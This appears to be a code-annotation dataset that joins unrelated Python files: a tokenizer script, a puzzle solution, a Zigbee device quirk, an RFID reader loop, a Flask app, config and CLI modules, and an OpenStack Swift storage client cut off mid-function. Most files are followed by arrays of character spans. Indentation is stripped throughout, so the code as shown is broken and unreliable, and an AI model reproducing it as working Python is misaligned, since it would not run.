help='Number of workers for parallel processing.')
args = parser.parse_args()
args = parser.parse_args()
input_files = sorted(glob.glob(os.path.expanduser(args.input_files)))
num_files = len(input_files)
num_workers = args.nworker
logging.basicConfig(level=logging.INFO)
logging.info("Number of input files to process = %d"%(num_files))
# TODO(haibin) tokenize with vocab
exclude_patterns = [
'< no ##in ##cl ##ude >\n'
]
def in_pattern(x):
for pattern in exclude_patterns:
if len(x) == len(pattern) and x == pattern:
return True
return False
def f(input_file):
with io.open(input_file, 'r', encoding="utf-8") as fin:
assert input_file.endswith('.tokens'), 'Expects .doc suffix for input files'
with io.open(input_file.replace('.tokens', '.tks'), 'w', encoding="utf-8") as fout:
new_doc = True
with io.open(input_file, 'r', encoding="utf-8") as fin:
lines = fin.readlines()
for line in lines:
if new_doc:
new_doc = False
elif len(line) == 1 and line[0] == '\n':
new_doc = True
fout.write(u'\n')
elif in_pattern(line):
pass
else:
fout.write(line)
if __name__ == '__main__':
tic = time.time()
p = Pool(num_workers)
p.map(f, input_files)
toc = time.time()
logging.info("Processed %s in %.2f sec"%(args.input_files, toc-tic))
| [
[
[
28,
32
],
[
1851,
1855
]
],
[
[
40,
48
],
[
174,
182
]
],
[
[
56,
60
],
[
564,
568
]
],
[
[
68,
70
],
[
574,
576
]
],
[
[
78,
80
],
[
1042,
1044
],
[
1191,
1193
],
[
1314,
1316
]
],
[
[
88,
92
],
[
1831,
1835
],
[
1905,
1909
]
],
[
[
100,
107
],
[
669,
676
],
[
695,
702
],
[
709,
716
],
[
1921,
1928
]
],
[
[
115,
130
]
],
[
[
138,
163
]
],
[
[
165,
171
],
[
228,
234
],
[
362,
368
],
[
495,
501
],
[
522,
528
]
],
[
[
488,
492
]
],
[
[
515,
519
],
[
593,
597
],
[
656,
660
],
[
1962,
1966
]
],
[
[
543,
554
],
[
629,
640
],
[
1882,
1893
]
],
[
[
613,
622
],
[
763,
772
]
],
[
[
642,
653
],
[
1856,
1867
]
],
[
[
811,
827
],
[
902,
918
]
],
[
[
868,
878
],
[
1679,
1689
]
],
[
[
1016,
1017
],
[
1879,
1880
]
],
[
[
1825,
1828
],
[
1984,
1987
]
],
[
[
1847,
1848
],
[
1873,
1874
]
],
[
[
1899,
1902
],
[
1980,
1983
]
]
] |
import sys; from more_itertools import windowed, first_true
orig_data = list(map(int, open('d9.txt')))
data = orig_data[:]
target = 32321523
for i, e in enumerate(data):
if i == 0: continue
data[i] = data[i - 1] + data[i]
for i in range(len(data)):
for j in range(i):
if data[i] - data[j] == target:
print(j, i, 'inclusive')
print(min(orig_data[j:i+1]) + max(orig_data[j:i+1]))
sys.exit() | [
[
[
7,
10
],
[
435,
438
]
],
[
[
39,
47
]
],
[
[
49,
59
]
],
[
[
60,
69
],
[
110,
119
],
[
380,
389
],
[
404,
413
]
],
[
[
103,
107
],
[
163,
167
],
[
208,
212
],
[
222,
226
],
[
198,
202
],
[
250,
254
],
[
292,
296
],
[
302,
306
]
],
[
[
123,
129
],
[
313,
319
]
],
[
[
145,
146
],
[
177,
178
],
[
213,
214
],
[
227,
228
],
[
203,
204
]
],
[
[
148,
149
]
],
[
[
235,
236
],
[
277,
278
],
[
297,
298
],
[
342,
343
],
[
392,
393
],
[
416,
417
]
],
[
[
266,
267
],
[
307,
308
],
[
339,
340
],
[
390,
391
],
[
414,
415
]
]
] |
"""Xiaomi aqara single key switch device."""
import logging
from zigpy.profiles import zha
from zigpy.zcl.clusters.general import (
AnalogInput,
Basic,
Groups,
Identify,
MultistateInput,
OnOff,
Ota,
Scenes,
)
from .. import (
LUMI,
XIAOMI_NODE_DESC,
BasicCluster,
XiaomiPowerConfiguration,
XiaomiQuickInitDevice,
)
from ... import CustomCluster
from ...const import (
ATTR_ID,
COMMAND,
DEVICE_TYPE,
DOUBLE_PRESS,
ENDPOINTS,
INPUT_CLUSTERS,
LONG_PRESS,
MODELS_INFO,
NODE_DESCRIPTOR,
OUTPUT_CLUSTERS,
PRESS_TYPE,
PROFILE_ID,
SHORT_PRESS,
SKIP_CONFIGURATION,
VALUE,
ZHA_SEND_EVENT,
)
DOUBLE = "double"
HOLD = "long press"
PRESS_TYPES = {0: "long press", 1: "single", 2: "double"}
SINGLE = "single"
STATUS_TYPE_ATTR = 0x0055 # decimal = 85
XIAOMI_CLUSTER_ID = 0xFFFF
XIAOMI_DEVICE_TYPE = 0x5F01
XIAOMI_DEVICE_TYPE2 = 0x5F02
XIAOMI_DEVICE_TYPE3 = 0x5F03
_LOGGER = logging.getLogger(__name__)
class RemoteB186ACN01(XiaomiQuickInitDevice):
"""Aqara single key switch device."""
class MultistateInputCluster(CustomCluster, MultistateInput):
"""Multistate input cluster."""
cluster_id = MultistateInput.cluster_id
def __init__(self, *args, **kwargs):
"""Init."""
self._current_state = None
super().__init__(*args, **kwargs)
def _update_attribute(self, attrid, value):
super()._update_attribute(attrid, value)
if attrid == STATUS_TYPE_ATTR:
self._current_state = PRESS_TYPES.get(value)
event_args = {
PRESS_TYPE: self._current_state,
ATTR_ID: attrid,
VALUE: value,
}
self.listener_event(ZHA_SEND_EVENT, self._current_state, event_args)
# show something in the sensor in HA
super()._update_attribute(0, self._current_state)
signature = {
# <SimpleDescriptor endpoint=1 profile=260 device_type=24321
# device_version=1
# input_clusters=[0, 3, 25, 65535, 18]
# output_clusters=[0, 4, 3, 5, 25, 65535, 18]>
MODELS_INFO: [
(LUMI, "lumi.remote.b186acn01"),
(LUMI, "lumi.remote.b186acn02"),
(LUMI, "lumi.sensor_86sw1"),
],
NODE_DESCRIPTOR: XIAOMI_NODE_DESC,
ENDPOINTS: {
1: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: XIAOMI_DEVICE_TYPE,
INPUT_CLUSTERS: [
Basic.cluster_id,
Identify.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster.cluster_id,
],
OUTPUT_CLUSTERS: [
Basic.cluster_id,
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster.cluster_id,
],
},
# <SimpleDescriptor endpoint=2 profile=260 device_type=24322
# device_version=1
# input_clusters=[3, 18]
# output_clusters=[4, 3, 5, 18]>
2: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: XIAOMI_DEVICE_TYPE2,
INPUT_CLUSTERS: [
Identify.cluster_id,
MultistateInputCluster.cluster_id,
],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
MultistateInputCluster.cluster_id,
],
},
# <SimpleDescriptor endpoint=3 profile=260 device_type=24323
# device_version=1
# input_clusters=[3, 12]
# output_clusters=[4, 3, 5, 12]>
3: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: XIAOMI_DEVICE_TYPE3,
INPUT_CLUSTERS: [Identify.cluster_id, AnalogInput.cluster_id],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
AnalogInput.cluster_id,
],
},
},
}
replacement = {
SKIP_CONFIGURATION: True,
ENDPOINTS: {
1: {
DEVICE_TYPE: zha.DeviceType.REMOTE_CONTROL,
INPUT_CLUSTERS: [
BasicCluster,
XiaomiPowerConfiguration,
Identify.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster,
],
OUTPUT_CLUSTERS: [
Basic.cluster_id,
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster,
OnOff.cluster_id,
],
},
2: {
DEVICE_TYPE: zha.DeviceType.REMOTE_CONTROL,
INPUT_CLUSTERS: [Identify.cluster_id, MultistateInputCluster],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
MultistateInputCluster,
],
},
3: {
DEVICE_TYPE: zha.DeviceType.REMOTE_CONTROL,
INPUT_CLUSTERS: [Identify.cluster_id, MultistateInputCluster],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
AnalogInput.cluster_id,
MultistateInputCluster,
],
},
},
}
device_automation_triggers = {
(DOUBLE_PRESS, DOUBLE_PRESS): {COMMAND: DOUBLE},
(SHORT_PRESS, SHORT_PRESS): {COMMAND: SINGLE},
(LONG_PRESS, LONG_PRESS): {COMMAND: HOLD},
}
| [
[
[
52,
59
],
[
980,
987
]
],
[
[
88,
91
],
[
2487,
2490
],
[
3401,
3404
],
[
4090,
4093
],
[
4606,
4609
],
[
5359,
5362
],
[
5747,
5750
]
],
[
[
137,
148
],
[
4210,
4221
],
[
4409,
4420
],
[
6031,
6042
]
],
[
[
154,
159
],
[
2606,
2611
],
[
2869,
2874
],
[
4985,
4990
]
],
[
[
165,
171
],
[
2948,
2954
],
[
3712,
3718
],
[
4331,
4337
],
[
5064,
5070
],
[
5565,
5571
],
[
5953,
5959
]
],
[
[
177,
185
],
[
2644,
2652
],
[
2907,
2915
],
[
3521,
3529
],
[
3671,
3679
],
[
4189,
4197
],
[
4290,
4298
],
[
4771,
4779
],
[
5023,
5031
],
[
5423,
5431
],
[
5524,
5532
],
[
5811,
5819
],
[
5912,
5920
]
],
[
[
191,
206
],
[
1147,
1162
],
[
1227,
1242
]
],
[
[
212,
217
],
[
5261,
5266
]
],
[
[
223,
226
],
[
2685,
2688
],
[
3026,
3029
],
[
4812,
4815
],
[
5142,
5145
]
],
[
[
232,
238
],
[
2987,
2993
],
[
3751,
3757
],
[
4370,
4376
],
[
5103,
5109
],
[
5604,
5610
],
[
5992,
5998
]
],
[
[
264,
268
],
[
2249,
2253
],
[
2294,
2298
],
[
2339,
2343
]
],
[
[
274,
290
],
[
2403,
2419
]
],
[
[
296,
308
],
[
4691,
4703
]
],
[
[
314,
338
],
[
4725,
4749
]
],
[
[
344,
365
],
[
1032,
1053
]
],
[
[
385,
398
],
[
1132,
1145
]
],
[
[
426,
433
],
[
1723,
1730
]
],
[
[
439,
446
],
[
6225,
6232
],
[
6280,
6287
],
[
6333,
6340
]
],
[
[
452,
463
],
[
2519,
2530
],
[
3433,
3444
],
[
4122,
4133
],
[
4593,
4604
],
[
5346,
5357
],
[
5734,
5745
]
],
[
[
469,
481
],
[
6195,
6207
],
[
6209,
6221
]
],
[
[
487,
496
],
[
2429,
2438
],
[
4547,
4556
]
],
[
[
502,
516
],
[
2568,
2582
],
[
3483,
3497
],
[
4172,
4186
],
[
4653,
4667
],
[
5406,
5420
],
[
5794,
5808
]
],
[
[
522,
532
],
[
6307,
6317
],
[
6319,
6329
]
],
[
[
538,
549
],
[
2221,
2232
]
],
[
[
555,
570
],
[
2386,
2401
]
],
[
[
576,
591
],
[
2830,
2845
],
[
3632,
3647
],
[
4251,
4266
],
[
4946,
4961
],
[
5485,
5500
],
[
5873,
5888
]
],
[
[
597,
607
],
[
1670,
1680
]
],
[
[
613,
623
],
[
2475,
2485
],
[
3389,
3399
],
[
4078,
4088
]
],
[
[
629,
640
],
[
6252,
6263
],
[
6265,
6276
]
],
[
[
646,
664
],
[
4513,
4531
]
],
[
[
670,
675
],
[
1760,
1765
]
],
[
[
681,
695
],
[
1828,
1842
]
],
[
[
700,
706
],
[
6234,
6240
]
],
[
[
718,
722
],
[
6342,
6346
]
],
[
[
738,
749
],
[
1596,
1607
]
],
[
[
796,
802
],
[
6289,
6295
]
],
[
[
814,
830
],
[
1540,
1556
]
],
[
[
856,
873
],
[
2721,
2738
],
[
3062,
3079
],
[
4848,
4865
],
[
5178,
5195
]
],
[
[
883,
901
],
[
2532,
2550
]
],
[
[
911,
930
],
[
3446,
3465
]
],
[
[
940,
959
],
[
4135,
4154
]
],
[
[
970,
977
]
],
[
[
1016,
1031
]
]
] |
"""
Problem:
The function 'doubler' takes a word as input.
It should create and print
a string, where each character in the string is doubled, for example:
"test" -> "tteesstt"
Tests:
>>> doubler("test")
tteesstt
>>> doubler("original")
oorriiggiinnaall
>>> doubler("hihihi")
hhiihhiihhii
"""
import doctest
def run_tests():
doctest.testmod(verbose=True)
def doubler(word):
print(''.join([char + char for char in word]))
if __name__ == "__main__":
run_tests() | [
[
[
337,
344
],
[
366,
373
]
],
[
[
349,
358
],
[
499,
508
]
],
[
[
401,
408
]
]
] |
import binascii
import sys
import Adafruit_PN532 as PN532
# Setup how the PN532 is connected to the Raspbery Pi/BeagleBone Black.
# It is recommended to use a software SPI connection with 4 digital GPIO pins.
# Configuration for a Raspberry Pi:
CS = 8 #pn532_nss----->rpi_ce0:8
MOSI = 9 #pn532_mosi---->rpi__miso:9
MISO = 10 #pn532_miso---->rpi__mosi:10
SCLK = 11 #pn532_sck----->rpi_sclk:11
# Configuration for a BeagleBone Black:
# CS = 'P8_7'
# MOSI = 'P8_8'
# MISO = 'P8_9'
# SCLK = 'P8_10'
# Create an instance of the PN532 class.
pn532 = PN532.PN532(cs=CS, sclk=SCLK, mosi=MOSI, miso=MISO)
# Call begin to initialize communication with the PN532. Must be done before
# any other calls to the PN532!
pn532.begin()
# Get the firmware version from the chip and print(it out.)
ic, ver, rev, support = pn532.get_firmware_version()
print('Found PN532 with firmware version: {0}.{1}'.format(ver, rev))
# Configure PN532 to communicate with MiFare cards.
pn532.SAM_configuration()
# Main loop to detect cards and read a block.
while True:
print('等待读卡中,请将卡靠近pn532读取设备...')
# Check if a card is available to read.
uid = pn532.read_passive_target()
# Try again if no card is available.
if uid is None:
continue
uid=format(binascii.hexlify(uid))
print("UID:",uid)
| [
[
[
8,
16
],
[
1277,
1285
]
],
[
[
24,
27
]
],
[
[
36,
59
],
[
561,
566
]
],
[
[
250,
252
],
[
576,
578
]
],
[
[
287,
291
],
[
596,
600
]
],
[
[
326,
330
],
[
607,
611
]
],
[
[
366,
370
],
[
585,
589
]
],
[
[
553,
558
],
[
724,
729
],
[
823,
828
],
[
974,
979
],
[
1151,
1156
]
],
[
[
799,
801
]
],
[
[
803,
806
],
[
910,
913
]
],
[
[
808,
811
],
[
915,
918
]
],
[
[
813,
820
]
],
[
[
1145,
1148
],
[
1232,
1235
],
[
1294,
1297
]
],
[
[
1266,
1269
],
[
1317,
1320
]
]
] |
from macaque import cli
def test_cli_template():
assert cli.cli() is None
| [
[
[
20,
23
],
[
61,
64
]
],
[
[
29,
46
]
]
] |
# Antes de mais nada install o flask = pip install flask
from flask import Flask
app = Flask(__name__)
@app.route('/')
def homepage():
return 'Essa é minha HomePage'
@app.route('/contatos')
def contatos():
return 'Essa são os meus contatos'
app.run() | [
[
[
75,
80
],
[
88,
93
]
],
[
[
82,
85
],
[
106,
109
],
[
174,
177
],
[
253,
256
]
],
[
[
125,
133
]
],
[
[
201,
209
]
]
] |
from itertools import zip_longest
DAY = 'day'
HOUR = 'hour'
NAME = 'name'
class Formatter:
def __init__(self, indent=5 * ' '):
self.indent = indent
def append(self, text, tag=None):
raise NotImplementedError('Must override append() in derived class')
def println(self, *args):
sep = None
for a in args:
if sep:
self.append(sep)
else:
sep = ' '
if isinstance(a, str):
self.append(a)
else:
self.append(*a)
self.append('\n')
def show(self, previous, day, hour, name, text):
if day:
if previous:
self.println()
self.println((day, DAY))
if name:
if not day:
self.println()
self.println((hour, HOUR), (name, NAME))
self.show_multiline(None, text)
else:
self.show_multiline(hour, text)
def show_multiline(self, hour, text):
hh = [(hour, HOUR)] if hour else []
for h, line in zip_longest(hh, text.split('\n'), fillvalue=self.indent):
self.println(h, line)
| [
[
[
22,
33
],
[
1091,
1102
]
],
[
[
35,
38
],
[
748,
751
]
],
[
[
47,
51
],
[
858,
862
],
[
1045,
1049
]
],
[
[
61,
65
],
[
872,
876
]
],
[
[
83,
92
]
]
] |
__all__ = [
"prototype",
]
import sys
from inspect import (
signature,
)
from typing import (
TypeVar,
Callable,
)
from .exceptions import (
PrototypeError,
)
if sys.version_info >= (3, 10):
from typing import ParamSpec
else:
from typing_extensions import ParamSpec # pragma: no cover
Parameters = ParamSpec("Parameters")
ReturnType = TypeVar("ReturnType")
# noinspection PyTypeHints
def prototype(
proto: Callable[Parameters, ReturnType],
/,
*,
runtime: bool = True,
) -> Callable[Parameters, ReturnType]:
"""
Prototype decorator acts like a type protection shield
that validates the parameters specification and return
type annotation of the function against given prototype.
If `runtime` parameter is set to True, decorator performs
prototype validation during runtime using the :class:`Signature`
class from :module:`inspect` module by comparing function and
prototype signatures against each other.
:param proto: prototype function
:param runtime: when set to True, performs prototype validation during runtime
:raises PrototypeError:
When function has incompatible signature for given prototype.
Exception is raised only when `runtime` argument is set to True.
"""
# noinspection PyTypeHints
def decorator(func: Callable[Parameters, ReturnType], /) -> Callable[Parameters, ReturnType]:
if runtime is True:
func_signature = signature(func)
proto_signature = signature(proto)
if func_signature.parameters != proto_signature.parameters:
raise PrototypeError(func, func_signature, proto, proto_signature)
if func_signature.return_annotation != proto_signature.return_annotation:
raise PrototypeError(func, func_signature, proto, proto_signature)
return func
return decorator
| [
[
[
0,
7
]
],
[
[
39,
42
],
[
187,
190
]
],
[
[
70,
79
],
[
1478,
1487
],
[
1524,
1533
]
],
[
[
109,
116
],
[
370,
377
]
],
[
[
122,
130
],
[
526,
534
],
[
447,
455
],
[
1387,
1395
],
[
1347,
1355
]
],
[
[
165,
179
],
[
1636,
1650
],
[
1806,
1820
]
],
[
[
239,
248
],
[
333,
342
]
],
[
[
289,
298
],
[
333,
342
]
],
[
[
320,
330
],
[
535,
545
],
[
456,
466
],
[
1396,
1406
],
[
1356,
1366
]
],
[
[
357,
367
],
[
547,
557
],
[
468,
478
],
[
1408,
1418
],
[
1368,
1378
]
],
[
[
425,
434
]
]
] |
import PIL.Image
from io import BytesIO
from IPython.display import clear_output, Image, display
import numpy as np
def showarray(a, fmt='jpeg'):
a = np.uint8(np.clip(a, 0, 255))
f = BytesIO()
PIL.Image.fromarray(a).save(f, fmt)
display(Image(data=f.getvalue()))
def showtensor(a):
mean = np.array([0.485, 0.456, 0.406]).reshape([1, 1, 3])
std = np.array([0.229, 0.224, 0.225]).reshape([1, 1, 3])
inp = a[0, :, :, :]
inp = inp.transpose(1, 2, 0)
inp = std * inp + mean
inp *= 255
showarray(inp)
clear_output(wait=True)
| [
[
[
7,
16
],
[
207,
210
]
],
[
[
32,
39
],
[
193,
200
]
],
[
[
68,
80
],
[
547,
559
]
],
[
[
82,
87
],
[
255,
260
]
],
[
[
89,
96
],
[
247,
254
]
],
[
[
104,
115
],
[
156,
158
],
[
165,
167
],
[
313,
315
],
[
374,
376
]
],
[
[
122,
131
],
[
528,
537
]
],
[
[
287,
297
]
]
] |
import mimetypes
from pathlib import Path
from appdirs import user_config_dir
from tqdm import tqdm
NAME = "novelsave"
AUTHOR = "Mensch272"
# base project directory
BASE_DIR = Path(__file__).resolve().parent.parent
STATIC_DIR = BASE_DIR / "novelsave/resources"
# operating system specific configuration file
# config directory is used to place logs, config, cache
CONFIG_DIR = Path(user_config_dir(NAME, AUTHOR))
CONFIG_FILE = CONFIG_DIR / "config.json"
DATA_DIR = CONFIG_DIR / "data"
DATABASE_FILE = (CONFIG_DIR / "data.sqlite").resolve()
DATABASE_URL = "sqlite:///" + str(DATABASE_FILE)
# default novel directory, where packaged files such
# as epub and pdf are stored.
NOVEL_DIR = Path.home() / "novels"
# the following map defines how files are stored
# by further subdivision into sub-folders
DIVISION_RULES = {
k: v.split("/", maxsplit=1)[0] for k, v in mimetypes.types_map.items()
}
def console_formatter(record):
if record["level"].name == "INFO":
return "{message}\n"
else:
return "<level>{level}: {message}</level>\n"
LOGGER_CONFIG = {
"handlers": [
{
"sink": lambda msg: tqdm.write(msg, end=""),
"format": console_formatter,
"level": "INFO",
"colorize": True,
"backtrace": False,
"diagnose": False,
},
{
"sink": CONFIG_DIR / "logs" / "{time}.log",
"level": "TRACE",
"retention": "2 days",
"compression": "zip",
"encoding": "utf-8",
},
],
}
TQDM_CONFIG = {"ncols": 80, "bar_format": "{percentage:3.0f}% |{bar}{r_bar}"}
config = {
"name": NAME,
"author": AUTHOR,
"base_dir": BASE_DIR,
"static": {
"dir": STATIC_DIR,
},
"config": {
"dir": CONFIG_DIR,
"file": CONFIG_FILE,
},
"data": {
"dir": DATA_DIR,
"division_rules": DIVISION_RULES,
},
"novel": {
"dir": NOVEL_DIR,
},
"infrastructure": {
"database": {
"url": DATABASE_URL,
}
},
}
| [
[
[
7,
16
],
[
873,
882
]
],
[
[
37,
41
],
[
179,
183
],
[
382,
386
],
[
692,
696
]
],
[
[
63,
78
],
[
387,
402
]
],
[
[
96,
100
],
[
1147,
1151
]
],
[
[
102,
106
],
[
403,
407
],
[
1667,
1671
]
],
[
[
121,
127
],
[
409,
415
],
[
1687,
1693
]
],
[
[
168,
176
],
[
232,
240
],
[
1711,
1719
]
],
[
[
219,
229
],
[
1752,
1762
]
],
[
[
369,
379
],
[
432,
442
],
[
471,
481
],
[
509,
519
],
[
1376,
1386
],
[
1802,
1812
]
],
[
[
418,
429
],
[
1830,
1841
]
],
[
[
460,
468
],
[
1879,
1887
]
],
[
[
492,
505
],
[
581,
594
]
],
[
[
547,
559
],
[
2051,
2063
]
],
[
[
680,
689
],
[
1968,
1977
]
],
[
[
807,
821
],
[
1915,
1929
]
],
[
[
909,
926
],
[
1194,
1211
]
],
[
[
1069,
1082
]
],
[
[
1565,
1576
]
],
[
[
1644,
1650
]
]
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import os
import sys
import click
from newschimp import renderer, sender
from newschimp.social import fb, gg, lanyrd
from newschimp.cli import cli_group
from newschimp.utils import ComplexCLI, load_settings
LOGGER = logging.getLogger(__name__)
def create_newsletter(settings):
"""Newsletter creation based on config and env variables"""
context = {}
try:
fb_posts = fb.get_posts(settings, os.environ['FACEBOOK_TOKEN'], None)
except KeyError:
LOGGER.error('Facebook Token not defined')
sys.exit()
click.echo('[1/4] Getting Facebook Group posts')
context['fb'] = fb.curate(fb_posts)
ggroup_posts = gg.get_posts(settings, None)
click.echo('[2/4] Getting Google Group posts')
context['gg'] = gg.curate(ggroup_posts)
click.echo('[3/4] Getting upcoming Lanyrd meetups')
context['meetups'] = lanyrd.meetup_loop(settings)
click.echo('[4/4] Rendering mail')
renderer.render_files(settings, None, context)
click.confirm(
'Content is rendered, would you like to send it now?', abort=True)
click.echo('Creating MailChimp campaign')
sender.new_campaign(settings, os.environ.get('MAILCHIMP_KEY'))
cli_group.add_command(fb.cli)
cli_group.add_command(gg.cli)
cli_group.add_command(lanyrd.cli)
@cli_group.command(cls=ComplexCLI, invoke_without_command=True)
@click.option('--config', help='Custom config file', type=click.Path(
exists=True, file_okay=True, resolve_path=True), default='config.yaml')
@click.pass_context
def main(ctx, config):
ctx.obj['SETTINGS'] = load_settings(config)
if ctx.invoked_subcommand is None:
create_newsletter(ctx.obj['SETTINGS'])
if __name__ == '__main__':
main(obj={})
| [
[
[
53,
60
],
[
280,
287
]
],
[
[
68,
70
],
[
475,
477
],
[
1212,
1214
]
],
[
[
78,
81
],
[
591,
594
]
],
[
[
90,
95
],
[
1407,
1412
],
[
1464,
1469
],
[
1553,
1558
],
[
606,
611
],
[
747,
752
],
[
842,
847
],
[
952,
957
],
[
1042,
1047
],
[
1136,
1141
]
],
[
[
119,
127
],
[
991,
999
]
],
[
[
129,
135
],
[
1182,
1188
]
],
[
[
165,
167
],
[
1269,
1271
],
[
452,
454
],
[
675,
677
]
],
[
[
169,
171
],
[
1299,
1301
],
[
714,
716
],
[
814,
816
]
],
[
[
173,
179
],
[
1329,
1335
],
[
919,
925
]
],
[
[
206,
215
],
[
1247,
1256
],
[
1277,
1286
],
[
1307,
1316
],
[
1343,
1352
]
],
[
[
244,
254
],
[
1365,
1375
]
],
[
[
256,
269
],
[
1621,
1634
]
],
[
[
271,
277
],
[
540,
546
]
],
[
[
314,
331
],
[
1690,
1707
]
],
[
[
1576,
1580
],
[
1762,
1766
]
]
] |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
PACKAGE = "flightaware"
NAME = "flightaware"
DESCRIPTION = "A python REST interface for flightaware data"
AUTHOR = "Fred Palmer"
AUTHOR_EMAIL = "fred.palmer@gmail.com"
URL = "https://github.com/fredpalmer/flightaware"
config = {
"description": DESCRIPTION,
"author": AUTHOR,
"url": URL,
"author_email": AUTHOR_EMAIL,
"version": "0.1",
"install_requires": [
"requests>=2.0.0",
"pytz"
],
"keywords": "travel flightaware airline flight flight-tracking flight-data",
"classifiers": [
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Internet :: WWW/HTTP",
],
"packages": [PACKAGE, ],
"scripts": [],
"name": NAME,
"license": "MIT",
}
setup(**config)
| [
[
[
32,
37
],
[
1028,
1033
]
],
[
[
89,
94
],
[
1028,
1033
]
],
[
[
96,
103
],
[
954,
961
]
],
[
[
120,
124
],
[
997,
1001
]
],
[
[
141,
152
],
[
345,
356
]
],
[
[
202,
208
],
[
372,
378
]
],
[
[
225,
237
],
[
416,
428
]
],
[
[
264,
267
],
[
391,
394
]
],
[
[
315,
321
],
[
1036,
1042
]
]
] |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 30, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12); | [
[
[
7,
37
]
],
[
[
45,
95
],
[
100,
103
]
]
] |
#
# (C) Copyright IBM Corp. 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import shutil
import logging
import requests
from lithops.storage.utils import StorageNoSuchKeyError
from lithops.utils import sizeof_fmt
from lithops.constants import STORAGE_CLI_MSG
logger = logging.getLogger(__name__)
class StorageBackend:
"""
A wrap-up around OpenStack Swift APIs.
"""
def __init__(self, swift_config):
logger.debug("Creating OpenStack Swift client")
self.auth_url = swift_config['swift_auth_url']
self.user_id = swift_config['swift_user_id']
self.project_id = swift_config['swift_project_id']
self.password = swift_config['swift_password']
self.region = swift_config['swift_region']
self.endpoint = None
if 'token' in swift_config:
self.token = swift_config['token']
self.endpoint = swift_config['endpoint']
else:
self.token = self.generate_swift_token()
swift_config['token'] = self.token
swift_config['endpoint'] = self.endpoint
self.session = requests.session()
self.session.headers.update({'X-Auth-Token': self.token})
adapter = requests.adapters.HTTPAdapter(pool_maxsize=64, max_retries=3)
self.session.mount('http://', adapter)
self.session.mount('https://', adapter)
msg = STORAGE_CLI_MSG.format('OpenStack Swift')
logger.info("{} - Region: {}".format(msg, self.region))
def generate_swift_token(self):
"""
Generates new token for accessing to Swift.
:return: token
"""
url = self.auth_url+"/v3/auth/tokens"
headers = {'Content-Type': 'application/json'}
data = {"auth": {"identity": {"methods": ["password"],
"password": {"user": {"id": self.user_id, "password": self.password}}},
"scope": {"project": {"id": self.project_id}}}}
json_data = json.dumps(data)
r = requests.post(url, data=json_data, headers=headers)
if r.status_code == 201:
backend_info = json.loads(r.text)
for service in backend_info['token']['catalog']:
if service['name'] == 'swift':
for endpoint in service['endpoints']:
if endpoint['region'] == self.region:
if endpoint['interface'] == 'public':
self.endpoint = endpoint['url'].replace('https:', 'http:')
if not self.endpoint:
raise Exception('Invalid region name')
return r.headers['X-Subject-Token']
else:
message = json.loads(r.text)['error']['message']
raise Exception("{} - {} - {}".format(r.status_code, r.reason, message))
def put_object(self, container_name, key, data):
"""
Put an object in Swift. Override the object if the key already exists.
:param key: key of the object.
:param data: data of the object
:type data: str/bytes
:return: None
"""
url = '/'.join([self.endpoint, container_name, key])
try:
res = self.session.put(url, data=data)
status = 'OK' if res.status_code == 201 else 'Error'
try:
logger.debug('PUT Object {} - Size: {} - {}'.format(key, sizeof_fmt(len(data)), status))
except Exception:
logger.debug('PUT Object {} - {}'.format(key, status))
except Exception as e:
print(e)
def get_object(self, container_name, key, stream=False, extra_get_args={}):
"""
Get object from Swift with a key. Throws StorageNoSuchKeyError if the given key does not exist.
:param key: key of the object
:return: Data of the object
:rtype: str/bytes
"""
if not container_name:
container_name = self.storage_container
url = '/'.join([self.endpoint, container_name, key])
headers = {'X-Auth-Token': self.token}
headers.update(extra_get_args)
try:
res = self.session.get(url, headers=headers, stream=stream)
if res.status_code == 200 or res.status_code == 206:
if stream:
data = res.raw
else:
data = res.content
return data
elif res.status_code == 404:
raise StorageNoSuchKeyError(container_name, key)
else:
raise Exception('{} - {}'.format(res.status_code, key))
except StorageNoSuchKeyError:
raise StorageNoSuchKeyError(container_name, key)
except Exception as e:
print(e)
raise StorageNoSuchKeyError(container_name, key)
def upload_file(self, file_name, bucket, key=None, extra_args={}):
"""Upload a file
:param file_name: File to upload
:param bucket: Bucket to upload to
:param key: S3 object name. If not specified then file_name is used
:return: True if file was uploaded, else False
"""
# If S3 key was not specified, use file_name
if key is None:
key = os.path.basename(file_name)
# Upload the file
try:
with open(file_name, 'rb') as in_file:
self.put_object(bucket, key, in_file)
except Exception as e:
logging.error(e)
return False
return True
def download_file(self, bucket, key, file_name=None, extra_args={}):
"""Download a file
:param bucket: Bucket to download from
:param key: S3 object name. If not specified then file_name is used
:param file_name: File to upload
:return: True if file was downloaded, else False
"""
# If file_name was not specified, use S3 key
if file_name is None:
file_name = key
# Download the file
try:
dirname = os.path.dirname(file_name)
if dirname and not os.path.exists(dirname):
